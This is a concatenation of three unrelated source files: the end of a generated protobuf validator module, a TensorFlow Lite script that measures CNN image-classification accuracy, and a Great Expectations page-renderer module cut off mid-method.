\x01(\x03H\x05\x88\x01\x01\x12\x14\n\x07len_gte\x18\x08 \x01(\x03H\x06\x88\x01\x01\x12\x13\n\x06unique\x18\n \x01(\x08H\x07\x88\x01\x01\x12#\n\x04item\x18\x0b \x01(\x0b\x32\x15.validator.TagOptionsB\x0b\n\t_not_nullB\t\n\x07_len_eqB\t\n\x07_len_neB\t\n\x07_len_ltB\t\n\x07_len_gtB\n\n\x08_len_lteB\n\n\x08_len_gteB\t\n\x07_unique\"\xbb\x02\n\x07MapTags\x12\x15\n\x08not_null\x18\x02 \x01(\x08H\x00\x88\x01\x01\x12\x13\n\x06len_eq\x18\x03 
\x01(\x03H\x01\x88\x01\x01\x12\x13\n\x06len_ne\x18\x04 \x01(\x03H\x02\x88\x01\x01\x12\x13\n\x06len_lt\x18\x05 \x01(\x03H\x03\x88\x01\x01\x12\x13\n\x06len_gt\x18\x06 \x01(\x03H\x04\x88\x01\x01\x12\x14\n\x07len_lte\x18\x07 \x01(\x03H\x05\x88\x01\x01\x12\x14\n\x07len_gte\x18\x08 \x01(\x03H\x06\x88\x01\x01\x12\"\n\x03key\x18\x0b \x01(\x0b\x32\x15.validator.TagOptions\x12$\n\x05value\x18\x0c \x01(\x0b\x32\x15.validator.TagOptionsB\x0b\n\t_not_nullB\t\n\x07_len_eqB\t\n\x07_len_neB\t\n\x07_len_ltB\t\n\x07_len_gtB\n\n\x08_len_lteB\n\n\x08_len_gte:G\n\x05\x66ield\x12\x1d.google.protobuf.FieldOptions\x18\xfc\xfb\x03 \x01(\x0b\x32\x17.validator.ValidOptions:G\n\x05oneof\x12\x1d.google.protobuf.OneofOptions\x18\x87\xfc\x03 \x01(\x0b\x32\x17.validator.ValidOptionsBg\n$io.github.yu31.protoc.pb.pbvalidatorB\x0bPBValidatorP\x00Z0github.com/yu31/protoc-plugin/xgo/pb/pbvalidatorb\x06proto3')
FIELD_FIELD_NUMBER = 65020
field = DESCRIPTOR.extensions_by_name['field']
ONEOF_FIELD_NUMBER = 65031
oneof = DESCRIPTOR.extensions_by_name['oneof']
_VALIDOPTIONS = DESCRIPTOR.message_types_by_name['ValidOptions']
_CHECKIF = DESCRIPTOR.message_types_by_name['CheckIf']
_TAGOPTIONS = DESCRIPTOR.message_types_by_name['TagOptions']
_ONEOFTAGS = DESCRIPTOR.message_types_by_name['OneOfTags']
_FLOATTAGS = DESCRIPTOR.message_types_by_name['FloatTags']
_INTTAGS = DESCRIPTOR.message_types_by_name['IntTags']
_UINTTAGS = DESCRIPTOR.message_types_by_name['UintTags']
_STRINGTAGS = DESCRIPTOR.message_types_by_name['StringTags']
_BYTESTAGS = DESCRIPTOR.message_types_by_name['BytesTags']
_BOOLTAGS = DESCRIPTOR.message_types_by_name['BoolTags']
_ENUMTAGS = DESCRIPTOR.message_types_by_name['EnumTags']
_MESSAGETAGS = DESCRIPTOR.message_types_by_name['MessageTags']
_REPEATEDTAGS = DESCRIPTOR.message_types_by_name['RepeatedTags']
_MAPTAGS = DESCRIPTOR.message_types_by_name['MapTags']
ValidOptions = _reflection.GeneratedProtocolMessageType('ValidOptions', (_message.Message,), {
'DESCRIPTOR' : _VALIDOPTIONS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.ValidOptions)
})
_sym_db.RegisterMessage(ValidOptions)
CheckIf = _reflection.GeneratedProtocolMessageType('CheckIf', (_message.Message,), {
'DESCRIPTOR' : _CHECKIF,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.CheckIf)
})
_sym_db.RegisterMessage(CheckIf)
TagOptions = _reflection.GeneratedProtocolMessageType('TagOptions', (_message.Message,), {
'DESCRIPTOR' : _TAGOPTIONS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.TagOptions)
})
_sym_db.RegisterMessage(TagOptions)
OneOfTags = _reflection.GeneratedProtocolMessageType('OneOfTags', (_message.Message,), {
'DESCRIPTOR' : _ONEOFTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.OneOfTags)
})
_sym_db.RegisterMessage(OneOfTags)
FloatTags = _reflection.GeneratedProtocolMessageType('FloatTags', (_message.Message,), {
'DESCRIPTOR' : _FLOATTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.FloatTags)
})
_sym_db.RegisterMessage(FloatTags)
IntTags = _reflection.GeneratedProtocolMessageType('IntTags', (_message.Message,), {
'DESCRIPTOR' : _INTTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.IntTags)
})
_sym_db.RegisterMessage(IntTags)
UintTags = _reflection.GeneratedProtocolMessageType('UintTags', (_message.Message,), {
'DESCRIPTOR' : _UINTTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.UintTags)
})
_sym_db.RegisterMessage(UintTags)
StringTags = _reflection.GeneratedProtocolMessageType('StringTags', (_message.Message,), {
'DESCRIPTOR' : _STRINGTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.StringTags)
})
_sym_db.RegisterMessage(StringTags)
BytesTags = _reflection.GeneratedProtocolMessageType('BytesTags', (_message.Message,), {
'DESCRIPTOR' : _BYTESTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.BytesTags)
})
_sym_db.RegisterMessage(BytesTags)
BoolTags = _reflection.GeneratedProtocolMessageType('BoolTags', (_message.Message,), {
'DESCRIPTOR' : _BOOLTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.BoolTags)
})
_sym_db.RegisterMessage(BoolTags)
EnumTags = _reflection.GeneratedProtocolMessageType('EnumTags', (_message.Message,), {
'DESCRIPTOR' : _ENUMTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.EnumTags)
})
_sym_db.RegisterMessage(EnumTags)
MessageTags = _reflection.GeneratedProtocolMessageType('MessageTags', (_message.Message,), {
'DESCRIPTOR' : _MESSAGETAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.MessageTags)
})
_sym_db.RegisterMessage(MessageTags)
RepeatedTags = _reflection.GeneratedProtocolMessageType('RepeatedTags', (_message.Message,), {
'DESCRIPTOR' : _REPEATEDTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.RepeatedTags)
})
_sym_db.RegisterMessage(RepeatedTags)
MapTags = _reflection.GeneratedProtocolMessageType('MapTags', (_message.Message,), {
'DESCRIPTOR' : _MAPTAGS,
'__module__' : 'proto.validator_pb2'
# @@protoc_insertion_point(class_scope:validator.MapTags)
})
_sym_db.RegisterMessage(MapTags)
if _descriptor._USE_C_DESCRIPTORS == False:
google_dot_protobuf_dot_descriptor__pb2.FieldOptions.RegisterExtension(field)
google_dot_protobuf_dot_descriptor__pb2.OneofOptions.RegisterExtension(oneof)
DESCRIPTOR._options = None
DESCRIPTOR._serialized_options = b'\n$io.github.yu31.protoc.pb.pbvalidatorB\013PBValidatorP\000Z0github.com/yu31/protoc-plugin/xgo/pb/pbvalidator'
_VALIDOPTIONS._serialized_start=70
_VALIDOPTIONS._serialized_end=159
_CHECKIF._serialized_start=161
_CHECKIF._serialized_end=222
_TAGOPTIONS._serialized_start=225
_TAGOPTIONS._serialized_end=672
_ONEOFTAGS._serialized_start=674
_ONEOFTAGS._serialized_end=721
_FLOATTAGS._serialized_start=724
_FLOATTAGS._serialized_end=911
_INTTAGS._serialized_start=914
_INTTAGS._serialized_end=1099
_UINTTAGS._serialized_start=1102
_UINTTAGS._serialized_end=1288
_STRINGTAGS._serialized_start=1291
_STRINGTAGS._serialized_end=4054
_BYTESTAGS._serialized_start=4057
_BYTESTAGS._serialized_end=4264
_BOOLTAGS._serialized_start=4266
_BOOLTAGS._serialized_end=4300
_ENUMTAGS._serialized_start=4303
_ENUMTAGS._serialized_end=4525
_MESSAGETAGS._serialized_start=4527
_MESSAGETAGS._serialized_end=4604
_REPEATEDTAGS._serialized_start=4607
_REPEATEDTAGS._serialized_end=4922
_MAPTAGS._serialized_start=4925
_MAPTAGS._serialized_end=5240
# @@protoc_insertion_point(module_scope)
|
py | b4103e8c3b1b205df3ac9a1e37adc7f5de358a4c | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Classify all the test dataset through our CNN to get accuracy.
"""
import numpy as np
import operator
import random
import glob
import argparse
import os.path
from data import DataSet
from processor import process_image
from tensorflow.keras.models import load_model
#from tensorflow.contrib.lite.python import interpreter as interpreter_wrapper
from tensorflow.lite.python import interpreter as interpreter_wrapper
from tensorflow.keras.preprocessing import image
import tensorflow as tf
import tensorflow.keras.backend as KTF
config = tf.ConfigProto()
config.gpu_options.allow_growth=True #dynamic alloc GPU resource
config.gpu_options.per_process_gpu_memory_fraction = 0.3 #GPU memory threshold 0.3
session = tf.Session(config=config)
# set session
KTF.set_session(session)
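# Note (added): tf.ConfigProto/tf.Session above are TF1-style APIs. If this script is
# run under TensorFlow 2.x (an assumption; the original TF version is not stated),
# the equivalent calls would be tf.compat.v1.ConfigProto / tf.compat.v1.Session.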
def predict(saved_model, image_file):
interpreter = interpreter_wrapper.Interpreter(model_path=saved_model)
interpreter.allocate_tensors()
input_details = interpreter.get_input_details()
output_details = interpreter.get_output_details()
# NxHxWxC, H:1, W:2
height = input_details[0]['shape'][1]
width = input_details[0]['shape'][2]
img = image.load_img(image_file, target_size=(height, width))
img = image.img_to_array(img)
# check the type of the input tensor
if input_details[0]['dtype'] == np.float32:
#img = preprocess_input(img)
img = img / 255.
#img = img/127.5 - 1
elif input_details[0]['dtype'] == np.uint8:
img = img.astype(np.uint8)
input_data = np.expand_dims(img, axis=0)
# Predict!
interpreter.set_tensor(input_details[0]['index'], input_data)
interpreter.invoke()
output_data = interpreter.get_tensor(output_details[0]['index'])
return output_data
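# Hedged example (not part of the original pipeline): a minimal sketch of calling
# predict() above for a single image. The function name and the default model/image
# paths are placeholders, not files shipped with this repository.
def example_single_prediction(model_file='model.tflite',
                              image_file='data/test_full/some_class/example.jpg'):
    scores = predict(model_file, image_file)        # output tensor, e.g. shape (1, num_classes)
    top_index = int(np.argmax(scores[0]))           # index of the highest-scoring class
    return top_index, float(scores[0][top_index])   # (class index, confidence)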
def validate_cnn_model(model_file):
data = DataSet()
#model = load_model(model_file)
# Get all our test images.
images = glob.glob(os.path.join('data', 'test_full', '**', '*.jpg'))
# Count the correct predict
result_count = 0
for image in images:
print('-'*80)
# Get a random row.
#sample = random.randint(0, len(images) - 1)
#image = images[sample]
# Get groundtruth class string
class_str = image.split(os.path.sep)[-2]
# Turn the image into an array.
print(image)
#image_arr = process_image(image, (224, 224, 3))
#image_arr = np.expand_dims(image_arr, axis=0)
# Predict.
predictions = predict(model_file, image)
# Show how much we think it's each one.
label_predictions = {}
for i, label in enumerate(data.classes):
label_predictions[label] = predictions[0][i]
sorted_lps = sorted(label_predictions.items(), key=operator.itemgetter(1), reverse=True)
# Get top-1 predict class as result
predict_class_str = sorted_lps[0][0]
if predict_class_str == class_str:
result_count = result_count + 1
for i, class_prediction in enumerate(sorted_lps):
# Just get the top five.
if i > 4:
break
print("%s: %.2f" % (class_prediction[0], class_prediction[1]))
i += 1
print("\nval_acc: %f" % (result_count/float(len(images))))
def main():
parser = argparse.ArgumentParser()
parser.add_argument('--model_file', help='model file to predict', type=str)
args = parser.parse_args()
if not args.model_file:
raise ValueError('model file is not specified')
validate_cnn_model(args.model_file)
if __name__ == '__main__':
main()
|
py | b4103e959e31b1f18bd321c6fd2370272f3c4d16 | import logging
import os
from collections import OrderedDict, defaultdict
from typing import Dict, List, Tuple, Union
from dateutil.parser import parse
from great_expectations.core import ExpectationSuite
from great_expectations.core.expectation_validation_result import (
ExpectationSuiteValidationResult,
)
from great_expectations.core.run_identifier import RunIdentifier
from great_expectations.data_context.util import instantiate_class_from_config
from great_expectations.exceptions import ClassInstantiationError
from great_expectations.render.renderer.renderer import Renderer
from great_expectations.render.types import (
CollapseContent,
RenderedComponentContent,
RenderedDocumentContent,
RenderedHeaderContent,
RenderedMarkdownContent,
RenderedSectionContent,
RenderedStringTemplateContent,
RenderedTableContent,
TextContent,
)
from great_expectations.render.util import num_to_str
from great_expectations.validation_operators.types.validation_operator_result import (
ValidationOperatorResult,
)
logger = logging.getLogger(__name__)
class ValidationResultsPageRenderer(Renderer):
def __init__(
self,
column_section_renderer=None,
run_info_at_end: bool = False,
data_context=None,
):
"""
Args:
column_section_renderer:
run_info_at_end: Move the run info (Info, Batch Markers, Batch Kwargs) to the end
of the rendered output rather than after Statistics.
"""
super().__init__()
if column_section_renderer is None:
column_section_renderer = {
"class_name": "ValidationResultsColumnSectionRenderer"
}
module_name = "great_expectations.render.renderer.column_section_renderer"
self._column_section_renderer = instantiate_class_from_config(
config=column_section_renderer,
runtime_environment={},
config_defaults={
"module_name": column_section_renderer.get("module_name", module_name)
},
)
if not self._column_section_renderer:
raise ClassInstantiationError(
module_name=module_name,
package_name=None,
class_name=column_section_renderer["class_name"],
)
self.run_info_at_end = run_info_at_end
self._data_context = data_context
def render_validation_operator_result(
self, validation_operator_result: ValidationOperatorResult
) -> List[RenderedDocumentContent]:
"""
Render a ValidationOperatorResult which can have multiple ExpectationSuiteValidationResult
Args:
validation_operator_result: ValidationOperatorResult
Returns:
List[RenderedDocumentContent]
"""
return [
self.render(validation_result)
for validation_result in validation_operator_result.list_validation_results()
]
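    # Hedged usage sketch (added comment): given an ExpectationSuiteValidationResult
    # `validation_result` obtained elsewhere, this page renderer is typically used as
    #     renderer = ValidationResultsPageRenderer()
    #     rendered_document = renderer.render(validation_result)
    # The variable names above are illustrative; only the classes and methods defined
    # in this module are assumed.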
# TODO: deprecate dual batch api support in 0.14
def render(
self,
validation_results: ExpectationSuiteValidationResult,
evaluation_parameters=None,
):
# Gather run identifiers
run_name, run_time = self._parse_run_values(validation_results)
expectation_suite_name = validation_results.meta["expectation_suite_name"]
batch_kwargs = (
validation_results.meta.get("batch_kwargs", {})
or validation_results.meta.get("batch_spec", {})
or {}
)
# Add datasource key to batch_kwargs if missing
if "datasource" not in batch_kwargs and "datasource" not in batch_kwargs:
# Check if expectation_suite_name follows datasource.batch_kwargs_generator.data_asset_name.suite_name pattern
if len(expectation_suite_name.split(".")) == 4:
batch_kwargs["datasource"] = expectation_suite_name.split(".")[0]
columns = self._group_evrs_by_column(validation_results, expectation_suite_name)
overview_content_blocks = [
self._render_validation_header(validation_results),
self._render_validation_statistics(validation_results=validation_results),
]
collapse_content_blocks = [
self._render_validation_info(validation_results=validation_results)
]
collapse_content_block = self._generate_collapse_content_block(
collapse_content_blocks, validation_results
)
if not self.run_info_at_end:
overview_content_blocks.append(collapse_content_block)
sections = self._collect_rendered_document_content_sections(
validation_results,
overview_content_blocks,
collapse_content_blocks,
columns,
)
# Determine whether we have a custom run_name
data_asset_name = batch_kwargs.get("data_asset_name", "")
page_title = self._determine_page_title(
run_name, run_time, data_asset_name, expectation_suite_name
)
return RenderedDocumentContent(
**{
"renderer_type": "ValidationResultsPageRenderer",
"page_title": page_title,
"batch_kwargs": batch_kwargs
if "batch_kwargs" in validation_results.meta
else None,
"batch_spec": batch_kwargs
if "batch_spec" in validation_results.meta
else None,
"expectation_suite_name": expectation_suite_name,
"sections": sections,
"utm_medium": "validation-results-page",
}
)
def _parse_run_values(
self, validation_results: ExpectationSuiteValidationResult
) -> Tuple[str, str]:
run_id: Union[str, dict, RunIdentifier] = validation_results.meta["run_id"]
if isinstance(run_id, str):
try:
run_time = parse(run_id).strftime("%Y-%m-%dT%H:%M:%S.%fZ")
except (ValueError, TypeError):
run_time = "__none__"
run_name = run_id
elif isinstance(run_id, dict):
run_name = run_id.get("run_name") or "__none__"
try:
t = run_id.get("run_time", "")
run_time = parse(t).strftime("%Y-%m-%dT%H:%M:%SZ")
except (ValueError, TypeError):
run_time = "__none__"
elif isinstance(run_id, RunIdentifier):
run_name = run_id.run_name or "__none__"
run_time = run_id.run_time.strftime("%Y-%m-%dT%H:%M:%S.%fZ")
return run_name, run_time
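    # Added comment: _parse_run_values accepts the three run_id shapes stored in
    # validation_results.meta["run_id"]:
    #   * str           -> run_name is the string itself, run_time parsed from it if possible
    #   * dict          -> run_name from "run_name", run_time parsed from "run_time"
    #   * RunIdentifier -> run_name/run_time taken from its attributes
    # Unparseable values fall back to the sentinel "__none__".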
def _group_evrs_by_column(
self,
validation_results: ExpectationSuiteValidationResult,
expectation_suite_name: str,
) -> Dict[str, list]:
columns = defaultdict(list)
try:
suite_meta = (
self._data_context.get_expectation_suite(expectation_suite_name).meta
if self._data_context is not None
else None
)
except:
suite_meta = None
meta_properties_to_render = self._get_meta_properties_notes(suite_meta)
for evr in validation_results.results:
if meta_properties_to_render is not None:
evr.expectation_config.kwargs[
"meta_properties_to_render"
] = meta_properties_to_render
if "column" in evr.expectation_config.kwargs:
column = evr.expectation_config.kwargs["column"]
else:
column = "Table-Level Expectations"
columns[column].append(evr)
return columns
def _generate_collapse_content_block(
self,
collapse_content_blocks: List[RenderedTableContent],
validation_results: ExpectationSuiteValidationResult,
) -> CollapseContent:
attrs = [
("batch_markers", "Batch Markers"),
("batch_kwargs", "Batch Kwargs"),
("batch_parameters", "Batch Parameters"),
("batch_spec", "Batch Spec"),
("batch_request", "Batch Definition"),
]
for attr, header in attrs:
if validation_results.meta.get(attr):
table = self._render_nested_table_from_dict(
input_dict=validation_results.meta.get(attr),
header=header,
)
collapse_content_blocks.append(table)
collapse_content_block = CollapseContent(
**{
"collapse_toggle_link": "Show more info...",
"collapse": collapse_content_blocks,
"styling": {
"body": {"classes": ["card", "card-body"]},
"classes": ["col-12", "p-1"],
},
}
)
return collapse_content_block
def _collect_rendered_document_content_sections(
self,
validation_results: ExpectationSuiteValidationResult,
overview_content_blocks: List[RenderedComponentContent],
collapse_content_blocks: List[RenderedTableContent],
columns: Dict[str, list],
) -> List[RenderedSectionContent]:
ordered_columns = Renderer._get_column_list_from_evrs(validation_results)
sections = [
RenderedSectionContent(
**{
"section_name": "Overview",
"content_blocks": overview_content_blocks,
}
)
]
if "Table-Level Expectations" in columns:
sections += [
self._column_section_renderer.render(
validation_results=columns["Table-Level Expectations"],
evaluation_parameters=validation_results.evaluation_parameters,
)
]
sections += [
self._column_section_renderer.render(
validation_results=columns[column],
evaluation_parameters=validation_results.evaluation_parameters,
)
for column in ordered_columns
]
if self.run_info_at_end:
sections += [
RenderedSectionContent(
**{
"section_name": "Run Info",
"content_blocks": collapse_content_blocks,
}
)
]
return sections
def _determine_page_title(
self,
run_name: str,
run_time: str,
data_asset_name: str,
expectation_suite_name: str,
) -> str:
try:
run_name_as_time = parse(run_name)
except ValueError:
run_name_as_time = None
try:
run_time_datetime = parse(run_time)
except ValueError:
run_time_datetime = None
include_run_name: bool = False
if run_name_as_time != run_time_datetime and run_name_as_time != "__none__":
include_run_name = True
page_title = f"Validations / {expectation_suite_name}"
if data_asset_name:
page_title += f" / {data_asset_name}"
if include_run_name:
page_title += f" / {run_name}"
page_title += f" / {run_time}"
return page_title
@classmethod
def _get_meta_properties_notes(cls, suite_meta):
"""
This method is used for fetching the custom meta to be added at the suite level
"notes": {
"content": {
"dimension": "properties.dimension",
"severity": "properties.severity"
},
"format": "renderer.diagnostic.meta_properties"
}
expectation level
{
"expectation_type": "expect_column_values_to_not_be_null",
"kwargs": {
"column": "city"
},
"meta": {
"attributes": {
"properties": {
"dimension": "completeness",
"severity": "P3"
},
"user_meta": {
"notes": ""
}
}
}
}
This will fetch dimension and severity values which are in the expectation meta.
"""
if (
suite_meta is not None
and "notes" in suite_meta
and "format" in suite_meta["notes"]
and suite_meta["notes"]["format"] == "renderer.diagnostic.meta_properties"
):
return suite_meta["notes"]["content"]
else:
return None
@classmethod
def _render_validation_header(cls, validation_results):
success = validation_results.success
expectation_suite_name = validation_results.meta["expectation_suite_name"]
expectation_suite_path_components = (
[".." for _ in range(len(expectation_suite_name.split(".")) + 3)]
+ ["expectations"]
+ str(expectation_suite_name).split(".")
)
expectation_suite_path = (
f"{os.path.join(*expectation_suite_path_components)}.html"
)
# TODO: deprecate dual batch api support in 0.14
batch_kwargs = (
validation_results.meta.get("batch_kwargs", {})
or validation_results.meta.get("batch_spec", {})
or {}
)
data_asset_name = batch_kwargs.get("data_asset_name")
if success:
success = "Succeeded"
html_success_icon = (
'<i class="fas fa-check-circle text-success" aria-hidden="true"></i>'
)
else:
success = "Failed"
html_success_icon = (
'<i class="fas fa-times text-danger" aria-hidden="true"></i>'
)
return RenderedHeaderContent(
**{
"content_block_type": "header",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Overview",
"tag": "h5",
"styling": {"classes": ["m-0"]},
},
}
),
"subheader": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "${suite_title} ${expectation_suite_name}\n ${data_asset} ${data_asset_name}\n ${status_title} ${html_success_icon} ${success}",
"params": {
"suite_title": "Expectation Suite:",
"data_asset": "Data asset:",
"data_asset_name": data_asset_name,
"status_title": "Status:",
"expectation_suite_name": expectation_suite_name,
"success": success,
"html_success_icon": html_success_icon,
},
"styling": {
"params": {
"suite_title": {"classes": ["h6"]},
"status_title": {"classes": ["h6"]},
"expectation_suite_name": {
"tag": "a",
"attributes": {"href": expectation_suite_path},
},
},
"classes": ["mb-0", "mt-1"],
},
},
}
),
"styling": {
"classes": ["col-12", "p-0"],
"header": {"classes": ["alert", "alert-secondary"]},
},
}
)
@classmethod
def _render_validation_info(cls, validation_results):
run_id = validation_results.meta["run_id"]
if isinstance(run_id, str):
try:
run_time = parse(run_id).strftime("%Y-%m-%dT%H:%M:%SZ")
except (ValueError, TypeError):
run_time = "__none__"
run_name = run_id
elif isinstance(run_id, dict):
run_name = run_id.get("run_name") or "__none__"
try:
run_time = str(
parse(run_id.get("run_time")).strftime("%Y-%m-%dT%H:%M:%SZ")
)
except (ValueError, TypeError):
run_time = "__none__"
elif isinstance(run_id, RunIdentifier):
run_name = run_id.run_name or "__none__"
run_time = run_id.run_time.strftime("%Y-%m-%dT%H:%M:%SZ")
# TODO: Deprecate "great_expectations.__version__"
ge_version = validation_results.meta.get(
"great_expectations_version"
) or validation_results.meta.get("great_expectations.__version__")
return RenderedTableContent(
**{
"content_block_type": "table",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Info",
"tag": "h6",
"styling": {"classes": ["m-0"]},
},
}
),
"table": [
["Great Expectations Version", ge_version],
["Run Name", run_name],
["Run Time", run_time],
],
"styling": {
"classes": ["col-12", "table-responsive", "mt-1"],
"body": {
"classes": ["table", "table-sm"],
"styles": {
"margin-bottom": "0.5rem !important",
"margin-top": "0.5rem !important",
},
},
},
}
)
@classmethod
def _render_nested_table_from_dict(cls, input_dict, header=None, sub_table=False):
table_rows = []
for kwarg, value in input_dict.items():
if not isinstance(value, (dict, OrderedDict)):
table_row = [
RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "$value",
"params": {"value": str(kwarg)},
"styling": {
"default": {"styles": {"word-break": "break-all"}},
},
},
"styling": {
"parent": {
"classes": ["pr-3"],
}
},
}
),
RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "$value",
"params": {"value": str(value)},
"styling": {
"default": {"styles": {"word-break": "break-all"}},
},
},
"styling": {
"parent": {
"classes": [],
}
},
}
),
]
else:
table_row = [
RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "$value",
"params": {"value": str(kwarg)},
"styling": {
"default": {"styles": {"word-break": "break-all"}},
},
},
"styling": {
"parent": {
"classes": ["pr-3"],
}
},
}
),
cls._render_nested_table_from_dict(value, sub_table=True),
]
table_rows.append(table_row)
table_rows.sort(key=lambda row: row[0].string_template["params"]["value"])
if sub_table:
return RenderedTableContent(
**{
"content_block_type": "table",
"table": table_rows,
"styling": {
"classes": ["col-6", "table-responsive"],
"body": {"classes": ["table", "table-sm", "m-0"]},
"parent": {"classes": ["pt-0", "pl-0", "border-top-0"]},
},
}
)
else:
return RenderedTableContent(
**{
"content_block_type": "table",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": header,
"tag": "h6",
"styling": {"classes": ["m-0"]},
},
}
),
"table": table_rows,
"styling": {
"body": {
"classes": ["table", "table-sm"],
"styles": {
"margin-bottom": "0.5rem !important",
"margin-top": "0.5rem !important",
},
}
},
}
)
@classmethod
def _render_validation_statistics(cls, validation_results):
statistics = validation_results.statistics
statistics_dict = OrderedDict(
[
("evaluated_expectations", "Evaluated Expectations"),
("successful_expectations", "Successful Expectations"),
("unsuccessful_expectations", "Unsuccessful Expectations"),
("success_percent", "Success Percent"),
]
)
table_rows = []
for key, value in statistics_dict.items():
if statistics.get(key) is not None:
if key == "success_percent":
# table_rows.append([value, "{0:.2f}%".format(statistics[key])])
table_rows.append(
[value, f"{num_to_str(statistics[key], precision=4)}%"]
)
else:
table_rows.append([value, statistics[key]])
return RenderedTableContent(
**{
"content_block_type": "table",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Statistics",
"tag": "h6",
"styling": {"classes": ["m-0"]},
},
}
),
"table": table_rows,
"styling": {
"classes": ["col-6", "table-responsive", "mt-1", "p-1"],
"body": {
"classes": ["table", "table-sm"],
"styles": {
"margin-bottom": "0.5rem !important",
"margin-top": "0.5rem !important",
},
},
},
}
)
class ExpectationSuitePageRenderer(Renderer):
def __init__(self, column_section_renderer=None):
super().__init__()
if column_section_renderer is None:
column_section_renderer = {
"class_name": "ExpectationSuiteColumnSectionRenderer"
}
module_name = "great_expectations.render.renderer.column_section_renderer"
self._column_section_renderer = instantiate_class_from_config(
config=column_section_renderer,
runtime_environment={},
config_defaults={
"module_name": column_section_renderer.get("module_name", module_name)
},
)
if not self._column_section_renderer:
raise ClassInstantiationError(
module_name=column_section_renderer,
package_name=None,
class_name=column_section_renderer["class_name"],
)
def render(self, expectations):
if isinstance(expectations, dict):
expectations = ExpectationSuite(**expectations, data_context=None)
(
columns,
ordered_columns,
) = expectations.get_grouped_and_ordered_expectations_by_column()
expectation_suite_name = expectations.expectation_suite_name
overview_content_blocks = [
self._render_expectation_suite_header(),
self._render_expectation_suite_info(expectations),
]
table_level_expectations_content_block = self._render_table_level_expectations(
columns
)
if table_level_expectations_content_block is not None:
overview_content_blocks.append(table_level_expectations_content_block)
asset_notes_content_block = self._render_expectation_suite_notes(expectations)
if asset_notes_content_block is not None:
overview_content_blocks.append(asset_notes_content_block)
sections = [
RenderedSectionContent(
**{
"section_name": "Overview",
"content_blocks": overview_content_blocks,
}
)
]
sections += [
self._column_section_renderer.render(expectations=columns[column])
for column in ordered_columns
if column != "_nocolumn"
]
return RenderedDocumentContent(
**{
"renderer_type": "ExpectationSuitePageRenderer",
"page_title": f"Expectations / {str(expectation_suite_name)}",
"expectation_suite_name": expectation_suite_name,
"utm_medium": "expectation-suite-page",
"sections": sections,
}
)
def _render_table_level_expectations(self, columns):
table_level_expectations = columns.get("_nocolumn")
if not table_level_expectations:
return None
else:
expectation_bullet_list = self._column_section_renderer.render(
expectations=table_level_expectations
).content_blocks[1]
expectation_bullet_list.header = RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Table-Level Expectations",
"tag": "h6",
"styling": {"classes": ["m-0"]},
},
}
)
return expectation_bullet_list
@classmethod
def _render_expectation_suite_header(cls):
return RenderedHeaderContent(
**{
"content_block_type": "header",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Overview",
"tag": "h5",
"styling": {"classes": ["m-0"]},
},
}
),
"styling": {
"classes": ["col-12"],
"header": {"classes": ["alert", "alert-secondary"]},
},
}
)
@classmethod
def _render_expectation_suite_info(cls, expectations):
expectation_suite_name = expectations.expectation_suite_name
# TODO: Deprecate "great_expectations.__version__"
ge_version = expectations.meta.get(
"great_expectations_version"
) or expectations.meta.get("great_expectations.__version__")
return RenderedTableContent(
**{
"content_block_type": "table",
"header": RenderedStringTemplateContent(
**{
"content_block_type": "string_template",
"string_template": {
"template": "Info",
"tag": "h6",
"styling": {"classes": ["m-0"]},
},
}
),
"table": [
["Expectation Suite Name", expectation_suite_name],
["Great Expectations Version", ge_version],
],
"styling": {
"classes": ["col-12", "table-responsive", "mt-1"],
"body": {
"classes": ["table", "table-sm"],
"styles": {
"margin-bottom": "0.5rem !important",
"margin-top": "0.5rem !important",
},
},
},
}
)
# TODO: Update tests
@classmethod
def _render_expectation_suite_notes(cls, expectations):
content = []
total_expectations = len(expectations.expectations)
columns = []
for exp in expectations.expectations:
if "column" in exp.kwargs:
columns.append(exp.kwargs["column"])
total_columns = len(set(columns))
content += [
# TODO: Leaving these two paragraphs as placeholders for later development.
# "This Expectation suite was first generated by {BasicDatasetProfiler} on {date}, using version {xxx} of Great Expectations.",
# "{name}, {name}, and {name} have also contributed additions and revisions.",
"This Expectation suite currently contains %d total Expectations across %d columns."
% (
total_expectations,
total_columns,
),
]
if "notes" in expectations.meta:
notes = expectations.meta["notes"]
note_content = None
if isinstance(notes, str):
note_content = [notes]
elif isinstance(notes, list):
note_content = notes
elif isinstance(notes, dict):
if "format" in notes:
if notes["format"] == "string":
if isinstance(notes["content"], str):
note_content = [notes["content"]]
elif isinstance(notes["content"], list):
note_content = notes["content"]
else:
logger.warning(
"Unrecognized Expectation suite notes format. Skipping rendering."
)
elif notes["format"] == "markdown":
if isinstance(notes["content"], str):
note_content = [
RenderedMarkdownContent(
**{
"content_block_type": "markdown",
"markdown": notes["content"],
"styling": {"parent": {}},
}
